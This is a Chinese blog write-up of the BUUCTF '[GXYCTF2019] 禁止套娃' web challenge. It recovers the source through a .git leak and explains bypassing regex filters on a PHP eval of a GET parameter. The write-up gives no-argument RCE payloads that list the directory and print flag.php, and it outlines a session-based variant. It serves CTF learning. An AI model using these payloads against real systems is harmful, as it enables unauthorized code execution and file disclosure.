wp-buuctf-禁止套娃(无参绕过)【多方法】

最新推荐文章于 2023-10-28 15:57:23 发布
最新推荐文章于 2023-10-28 15:57:23 发布
阅读量2.1k 收藏 2
点赞数
分类专栏: buuctf 文章标签: php 正则表达式 网络安全 wp git
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bin789456/article/details/121147342
版权

wp

在这里插入图片描述
一开始没看到什么东西,那就开始找吧,常用备份,robots协议,目录爆破,git泄露慢慢试。
试了下git泄露,有东西了:
在这里插入图片描述
打开得到的index.php,源码如下:

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

非常明显的命令执行加waf
现在就是绕waf了。

这里正则表达式很多。推荐大家用正则自动化工具,第一个if把伪协议相关读取给禁止掉。
第二个if规定是带括号无参才能执行,就是这种:
在这里插入图片描述
在这里插入图片描述
所以,这里的关键就是无参。
如果是 scandir(.) 就可以扫描当前目录了,就差一个点。那么用相关函数来返回出一个点就可以了。

localeconv()

在这里插入图片描述
这个数组的第一个值是一个.

current()

在这里插入图片描述
用它来返回当前值,数组一开始肯定是指头嘛,就能够取出第一个值–.

payload1:

?exp=print_r(scandir(current(localeconv())));

在这里插入图片描述
看到flag了。

payload2

取出数组值,在current()中提到了next(),next能够指向下一元素,但是在这里是不能嵌套使用的,因为是对一个数组对象进行next操作,返回下一指针后我们当然不能对返回值进行next操作。

除非我们可以一直对数组变量操作。这里不太现实。

不过这也就是说我们可以有一次移动机会,关键就在这里,虽然正序仅移动一次不能看到flag.php,但是我们可以逆序后移动一次拿到flag.php

所以,payload2:

?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

当然你也可以使用show_source()current()也可以换成pos()

在这里插入图片描述

其他解法

使用session来完成,如果你不是很了解session的话,可以看这个:

Session工作机制

这里也非常巧妙,因为session_start()是仅返回true的,所以也是一个无参构造
在这里插入图片描述
接下来把它取出来即可。
在这里插入图片描述
也能得到flag,不过需要你对session有熟悉的了解。

sayo.
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
buuctf-[GXYCTF2019]禁止套娃
qq_42728977的博客
12-24 3458
[GXYCTF2019]禁止套娃考点复现法一:单纯构造GET参数法二:构造session组合拳参考 考点 正则表达、无参数rce、git泄露 复现 法一:单纯构造GET参数 打开就一句 然后查看源码,空空如也。想到扫描后台文件,使用御剑很慢,使用dirsearch,一直429,查找资料,加了-s参数,也就是扫描不能太快。 python3 .\dirsearch.py -u http://5c0edec0-316a-4de9-999a-669f813c771b.node4.buuoj.cn:81/ -e
BUUCTF-[GXYCTF2019]禁止套娃
yuqie的博客
04-06 256
对于第二个if,(?R)是引用当前表达式,(?\),可以迭代下去,那么它所匹配的就是print(echo(1))、a(b(c()));所以可以先利用函数array_reverse将数组反转,flag就在第二位了,再利用next指向第二位数组,在用文件显示包涵即可输出flag.php文件,构造payload。开始审计源码,我们最终的目标是执行@eval($_GET['exp']),从这开始瞄一下大佬的wp,因为我的脚本基础差的没眼看。pos(),传入数组,回显第一个数组的值,pos可以用current代替。
BuuCTF [GXYCTF2019]禁止套娃详解(两种方法
最新发布
2301_76690905的博客
10-28 490
点入题目没有提示,常规抓包看源码扫目录,用dirsearch扫目录的时候扫出git第一眼看见第二个if语句,if(';R)?\)/', NULL, $_GET['exp']))可以看出这是典型的无参数rce,然后是后面的if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp']),这里限制了phpinfo(),getcwd()这些函数用不了。
web buuctf [GXYCTF2019]禁止套娃1
weixin_44214568的博客
03-24 1716
考点:1.git泄露 2.无参RCE 1.用御剑扫后台没扫到啥东西 看robots.txt文本,也没有 2.都这样了,考虑一下有没有可能存在.git泄露, (我装了两个版本的python,githack需要在python2下运行) index.php源码如下 <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:.
#WEB-buuctf-禁止套娃 1
weixin_52804141的博客
12-25 153
是一个黑名单绕过像et,na,info,dec,bin,hex,oct,pi,log,i不能使用。因为上述过滤的并未过滤 session_id() 所以我想到的使用 session_id来获取 flag。)时,可执行exp传递的命令。然后过滤了data协议,filter协议,php伪协议,phar。一,进入环境,在目录扫描未果,猜测可能是.git泄露,尝试一下。二,利用工具scrabble,果真是.git泄露。1,.git泄露,scrabble的使用。得到如下源码,开始代码审计。2,无参数RCE,通过。
医学-套娃状锰氧化合物纳米晶复合粒子及其制备方法.zip
11-12
标题中的“医学-套娃状锰氧化合物纳米晶复合粒子及其制备方法”揭示了这个文件内容的核心,它涉及到的是一个与医学相关的科研成果,具体是关于一种特殊的锰氧化合物纳米晶复合粒子的结构设计和制造工艺。在医学领域...
HDFView-3.1.2-win10_64-vs16压缩套娃.zip
03-17
对于HDF5,HDFView支持更多高级特性,如数据集的切片和索引,以及复杂的元数据管理。此外,HDFView还支持NetCDF文件,使得用户能够无缝地处理这两种格式的数据。 在HDFView-3.1.2-win10_64-vs16这个版本中,主要...
Python-Python隐写工具用来在图像中隐藏图像或文本
08-10
描述中提到的“在图像中隐藏图像或文本”,进一步强调了Python隐写工具的多功能性。它可以不仅仅隐藏文本信息,还可以隐藏完整的图像文件。隐藏图像时,通常是将另一张图像的数据编码并嵌入到主图像的像素中,而隐藏...
2010 “中兴捧月”校园程序设计大赛---俄罗斯套娃源码
05-21
本人写的一个关于俄罗斯套娃的源程序,其目的是抛砖引玉,欢迎大家分享优质、高效的代码。 经过本人强力测试,可以处理重量为0的娃娃。其实这也是这个程序比较难的地方。娃娃的重量为0,就表示该路口没有套娃可以...
众星捧月-俄罗斯套娃游戏开发
06-19
将Cross.txt文本中的的所代表的套娃重量的矩阵数据读入到Boy类的的成员weight二维数组中。 第二步:定义了向上走、向下走、向左走、向右走四个方向函数:Up()、Down()、Left()、Right(),每个函数都有一个...
php string ctf,PHP字符解析特性绕WAF【buuctf题 easy calc】
weixin_39939601的博客
03-11 296
一、PHP字符串解析特性PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会:1.删除空白符2.将某些字符转换为下划线(包括空格)例如,/?%20news[id%00=42会转换为Array([news_id] => 42),然后参数%20news[id%00的值将存储到$_GET["news_id"]中。(URL编码%20是空格,%00是0)例如:User inputDec...
从一道ctf题中学会了利用LD_PRELOAD突破disable_functions
蚁景网安学院
11-28 736
前言从一道ctf题中学会了利用LD_PRELOAD突破disable_functions。题目分析这是一个白盒测试,提供了完整的源代码。下面是进入这个挑战的首页面,你将会看到一个简单的登...
BUUCTF Misc wp大合集(1)
Ivyyyyyy1的博客
07-03 2179
BUUCTF Misc 杂项方向write up合集(一),持续更新中
BUUCTF题目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 7523
BUUCTF题目Misc部分wp(持续更新)
BUUCTF--Web篇详细wp
Aluxian_的博客
04-10 4295
BUUCTF--Web篇详细wp
buuctf-[GXYCTF2019]禁止套娃(小宇特详解)
小宇的web博客
02-12 1188
buuctf-[GXYCTF2019]禁止套娃(小宇特详解) 这里先看题 这里没有找到什么有用的信息,先使用dirsearch来爆破但是没有找到有用的,这时我就怀疑是有git泄露了这里使用githack探测发现了index.php 这里直接看源码吧 <?php 2 include "flag.php"; 3 echo "flag在哪里呢?<br>"; 4 if(isset($_GET['exp'])){//需要以GET形式传入一个名为exp的参数。如果满足条件会执行这个exp参数的
BUUCTF:[GXYCTF2019]禁止套娃
末初的CSDN博客
12-08 1492
https://buuoj.cn/challenges#[GXYCTF2019]%E7%A6%81%E6%AD%A2%E5%A5%97%E5%A8%83 .git泄露,使用GitHack index.php <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i',
BUUCTF】[GXYCTF2019]禁止套娃
aoao331198的博客
04-13 825
dirsearch扫描目录发现存在git泄露 于是用GitHack 生成index.php <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';' === preg_replace('/[a-z,_]+\
BUUCTF-WEB-[GXYCTF2019]禁止套娃
r1727337824的博客
08-29 436
.git源码泄露+代码审计 转载大佬的WP https://blog.csdn.net/weixin_43952190/article/details/107061554 1.打开网址只显示了flag在哪,查看源代码无任何有用信息 2.用御剑也没搜索到后台目录 3.这时候考虑源码泄露 打开网址 http://33c53ef7-d371-44a3-8d84-7ab89291c754.node3.buuoj.cn/.git 出现403错误 403错误是一种在网站访问过程中,常见的错误提示,表示资源不可用。
函数指针声明 入参 返参 func 套娃
09-16
函数指针声明可以通过使用typedef来简化语法,并且可以通过声明结构体来创建一个带有函数指针成员的嵌套结构体。 例如,我们可以使用以下方式来声明一个函数指针变量: ```c typedef int (*FuncPtr)(int); ``` 这里的`FuncPtr`就是一个函数指针类型,它接受一个整型参数,并返回一个整型结果。 接下来,我们可以通过声明一个结构体,并在其中包含一个函数指针成员来创建一个嵌套结构体。例如: ```c typedef struct { FuncPtr func; } NestedStruct; ``` 在这个例子中,`NestedStruct`是一个结构体类型,其中包含一个名为`func`的成员,其类型为函数指针`FuncPtr`。 这样,我们就可以使用函数指针变量`FuncPtr`作为参数和返回类型,在函数中使用函数指针`func`作为入参和返回值。通过嵌套结构体`NestedStruct`,我们可以更好地组织和管理函数指针变量和其他数据。 总的来说,通过使用typedef来声明函数指针类型,以及通过声明嵌套结构体来创建带有函数指针成员的结构体,可以更方便地使用和管理函数指针的入参和返参。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值